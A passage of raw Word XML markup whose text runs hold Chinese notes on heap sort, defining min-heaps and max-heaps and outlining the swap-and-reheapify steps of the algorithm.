          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="000D4225" w:rsidRPr="000508BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>非稳定的</w:t>
      </w:r>
      <w:r w:rsidRPr="000508BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>排序算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA21D0" w:rsidRDefault="00AA21D0" w:rsidP="00AA21D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="115" w:beforeAutospacing="0" w:after="115" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>个元素的序列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>{k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>…,k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>当且仅当满足下列关系之一时，称之为堆。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA21D0" w:rsidRDefault="00AA21D0" w:rsidP="00AA21D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="115" w:beforeAutospacing="0" w:after="115" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">　　情形</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;= k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>2i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;= k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>2i+1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>最小化堆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>小顶堆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA21D0" w:rsidRDefault="00AA21D0" w:rsidP="00AA21D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="115" w:beforeAutospacing="0" w:after="115" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">　　情形</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&gt;= k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>2i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&gt;= k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>2i+1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>最大化堆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>大顶堆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA21D0" w:rsidRDefault="00AA21D0" w:rsidP="00AA21D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其基本思想为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>大顶堆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA21D0" w:rsidRDefault="00AA21D0" w:rsidP="00AA21D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>    1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将初始待排序关键字序列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(R1,R2....Rn)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>构建成大顶堆，此堆为初始的无序区；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA21D0" w:rsidRDefault="00AA21D0" w:rsidP="00AA21D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>    2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将堆顶元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>R[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>与最后一个元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>R[n]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交换，此时得到新的无序区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(R1,R2,......Rn-1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和新的有序区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(Rn),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>且满足</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>R[1,2...n-1]&lt;=R[n]; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA21D0" w:rsidRDefault="00AA21D0" w:rsidP="00AA21D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>    3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>由于交换后新的堆顶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>R[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可能违反堆的性质，因此需要对当前无序区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(R1,R2,......Rn-1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>调整为新堆，然后再次将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>R[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>与无序区最后一个元素交换，得到新的无序区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(R1,R2....Rn-2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和新的有序区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(Rn-1,Rn)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。不断重复此过程直到有序区的元素个数为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
